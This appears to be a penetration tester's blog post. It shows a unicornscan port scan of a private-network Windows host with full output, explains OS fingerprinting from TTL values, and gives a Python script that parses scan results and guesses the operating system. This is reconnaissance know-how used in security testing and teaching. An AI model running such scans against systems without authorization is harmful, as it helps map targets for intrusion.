BT ~ # unicornscan -mT -vvv -I -r300 -E 192.168.1.55
adding 192.168.1.55/32 mode `TCPscan' ports `7,9,11,13,18,19,21-23,25,37,39,42,49,50,53,65,67-70,79-81,88,98,100,105-107,109-111,113,118,119,123,129,135,137-139,143,150,161-164,174,177-179,191,199-202,204,206,209,210,213,220,345,346,347,369-372,389,406,407,422,443-445,487,500,512-514,517,518,520,525,533,538,548,554,563,587,610-612,631-634,636,642,653,655,657,666,706,750-752,765,779,808,873,901,923,941,946,992-995,1001,1023-1030,1080,1210,1214,1234,1241,1334,1349,1352,1423-1425,1433,1434,1524,1525,1645,1646,1649,1701,1718,1719,1720,1723,1755,1812,1813,2048-2050,2101-2104,2140,2150,2233,2323,2345,2401,2430,2431,2432,2433,2583,2628,2776,2777,2988,2989,3050,3130,3150,3232,3306,3389,3456,3493,3542-3545,3632,3690,3801,4000,4400,4321,4567,4899,5002,5136-5139,5150,5151,5222,5269,5308,5354,5355,5422-5425,5432,5503,5555,5556,5678,6000-6007,6346,6347,6543,6544,6789,6838,6666-6670,7000-7009,7028,7100,7983,8079-8082,8088,8787,8879,9090,9101-9103,9325,9359,10000,10026,10027,10067,10080,10081,10167,10498,11201,15345,17001-17003,18753,20011,20012,21554,22273,26274,27374,27444,27573,31335-31338,31787,31789,31790,31791,32668,32767-32780,33390,47262,49301,54320,54321,57341,58008,58009,58666,59211,60000,60006,61000,61348,61466,61603,63485,63808,63809,64429,65000,65506,65530-65535' pps 300
using interface(s) eth0
added module payload for port 80 proto 6
added module payload for port 80 proto 6
added module payload for port 518 proto 17
added module payload for port 53 proto 17
added module payload for port 5060 proto 17
added module payload for port 1900 proto 17
scaning 1.00e+00 total hosts with 3.38e+02 total packets, should take a little longer than 8 Seconds
drone type Unknown on fd 3 is version 1.1
added module payload for port 80 proto 6
added module payload for port 80 proto 6
added module payload for port 518 proto 17
added module payload for port 53 proto 17
added module payload for port 5060 proto 17
added module payload for port 1900 proto 17
opening config file `/usr/local/etc/unicornscan/payloads.conf'
opening config file `/usr/local/etc/unicornscan/modules.conf'
drone type Unknown on fd 5 is version 1.1
scan iteration 1 out of 1
using pcap filter: `dst 192.168.58.129 and ! src 192.168.58.129 and (tcp or icmp)'
using TSC delay
TCP open 192.168.1.55:21 ttl 128
sender statistics 217.4 pps with 338 packets sent total
TCP--R----- unknown[32668] from 192.168.1.55 ttl 128
TCP--R----- unknown[32767] from 192.168.1.55 ttl 128
TCP--R----- filenet-tms[32768] from 192.168.1.55 ttl 128
TCP--R----- filenet-rpc[32769] from 192.168.1.55 ttl 128
TCP--R----- filenet-nch[32770] from 192.168.1.55 ttl 128
TCP--R----- filenet-rmi[32771] from 192.168.1.55 ttl 128
TCP--R----- filenet-cm[32773] from 192.168.1.55 ttl 128
TCP--R----- filenet-re[32774] from 192.168.1.55 ttl 128
TCP--R----- unknown[32776] from 192.168.1.55 ttl 128
TCP--R----- unknown[47262] from 192.168.1.55 ttl 128
TCP--R----- unknown[49301] from 192.168.1.55 ttl 128
TCP--R----- unknown[54320] from 192.168.1.55 ttl 128
TCP--R----- unknown[54321] from 192.168.1.55 ttl 128
TCP--R----- unknown[58008] from 192.168.1.55 ttl 128
TCP--R----- unknown[58009] from 192.168.1.55 ttl 128
TCP--R----- unknown[58666] from 192.168.1.55 ttl 128
TCP--R----- unknown[59211] from 192.168.1.55 ttl 128
TCP--R----- unknown[60000] from 192.168.1.55 ttl 128
TCP--R----- unknown[60006] from 192.168.1.55 ttl 128
TCP--R----- unknown[61000] from 192.168.1.55 ttl 128
TCP--R----- unknown[61466] from 192.168.1.55 ttl 128
TCP--R----- unknown[61603] from 192.168.1.55 ttl 128
TCP--R----- unknown[63485] from 192.168.1.55 ttl 128
TCP--R----- unknown[63809] from 192.168.1.55 ttl 128
TCP--R----- unknown[64429] from 192.168.1.55 ttl 128
TCP--R----- unknown[65000] from 192.168.1.55 ttl 128
TCP--R----- unknown[65506] from 192.168.1.55 ttl 128
TCP--R----- unknown[65532] from 192.168.1.55 ttl 128
TCP--R----- unknown[65533] from 192.168.1.55 ttl 128
TCP--R----- unknown[65534] from 192.168.1.55 ttl 128
main exiting

The results show that certain ports are open, while most responses carry the R (reset) flag. This is a Windows server: by looking at the TTL I can easily infer that it is a Windows machine. Different operating systems use different default TTL values, and TTL 128 belongs to the Windows group. Of course you can change it in the registry, but most people leave it at the default. Search Google for the TTL values Cisco devices use; you might find some interesting stuff.
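
To show the TTL reasoning in code, here is an added example (not part of the original post or of the scanner's own code) that parses result lines in the format quoted above, separates open ports from RST replies, and guesses the OS family from the observed TTL. It uses the common initial TTLs of 64 (Linux/Unix), 128 (Windows) and 255 (Cisco IOS and many network devices), and assumes the observed TTL equals the initial value minus the number of router hops, so it picks the smallest default at or above the observed value. The sample lines are constructed, and the second host (10.0.0.7) is invented to show a decremented TTL.

```python
import re
from collections import defaultdict

# Constructed sample in the same shape as the scan output quoted above
# (one host with a Windows-like TTL 128, one with a decremented Unix-like TTL).
SAMPLE_OUTPUT = """\
TCP--R----- mysql[ 3306] from 192.168.1.55 ttl 128
TCP--R----- ms-wbt-server[ 3389] from 192.168.1.55 ttl 128
TCP open unknown[ 8081] from 192.168.1.55 ttl 128
TCP open ssh[   22] from 10.0.0.7 ttl 61
TCP--R----- http[   80] from 10.0.0.7 ttl 61
main exiting
"""

# One result line: either "TCP open" or "TCP" followed directly by an
# 8-character TCP flag field such as "--R-----" (R = RST).
LINE_RE = re.compile(
    r"^TCP(?:\s+(?P<open>open)|(?P<flags>[A-Z-]{8}))\s+"
    r"(?P<service>[\w-]+)\[\s*(?P<port>\d+)\]\s+"
    r"from\s+(?P<host>\d+\.\d+\.\d+\.\d+)\s+ttl\s+(?P<ttl>\d+)\s*$"
)

# Common initial TTLs (assumed defaults). The observed TTL is the initial
# value minus the router hops, so match the smallest default >= observed.
TTL_DEFAULTS = {
    64: "Linux/Unix",
    128: "Windows",
    255: "Cisco IOS / network device",
}


def guess_os(ttl):
    """Return (os_family, estimated_hops) for an observed TTL."""
    for initial in sorted(TTL_DEFAULTS):
        if ttl <= initial:
            return TTL_DEFAULTS[initial], initial - ttl
    return "unknown", 0


def parse_scan(text):
    """Parse scanner result lines into dicts; non-matching lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # e.g. "main exiting" or blank lines
        flags = m.group("flags") or ""
        if m.group("open"):
            state = "open"
        elif "R" in flags:
            state = "reset"
        else:
            state = "other"
        records.append({
            "host": m.group("host"),
            "port": int(m.group("port")),
            "service": m.group("service"),
            "state": state,
            "ttl": int(m.group("ttl")),
        })
    return records


def summarize_scan(text):
    """Per host: open ports, number of RST replies, and a TTL-based OS guess."""
    per_host = defaultdict(lambda: {"open_ports": [], "reset_count": 0, "ttls": set()})
    for r in parse_scan(text):
        entry = per_host[r["host"]]
        entry["ttls"].add(r["ttl"])
        if r["state"] == "open":
            entry["open_ports"].append(r["port"])
        elif r["state"] == "reset":
            entry["reset_count"] += 1
    summary = {}
    for host, entry in per_host.items():
        # Use the highest TTL seen; a mix of TTLs from one address is itself
        # worth noting (load balancer, NAT, or replies from different stacks).
        ttl = max(entry["ttls"])
        os_guess, hops = guess_os(ttl)
        summary[host] = {
            "open_ports": sorted(entry["open_ports"]),
            "reset_count": entry["reset_count"],
            "ttl": ttl,
            "os_guess": os_guess,
            "hops": hops,
            "mixed_ttl": len(entry["ttls"]) > 1,
        }
    return summary


if __name__ == "__main__":
    for host, info in summarize_scan(SAMPLE_OUTPUT).items():
        print(host, info)
```

The guess is only a heuristic: a host whose administrator changed the TTL in the registry, or a reply that has crossed more hops than expected, will land in the wrong bucket, which is why the summary also flags hosts that answer with more than one TTL.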

I will be busy pentesting a telco for the next few days, so maybe fewer updates. But well, I will try to get back on track soon with more commands. Meanwhile, I am going to use Rsnake's fierce for my project.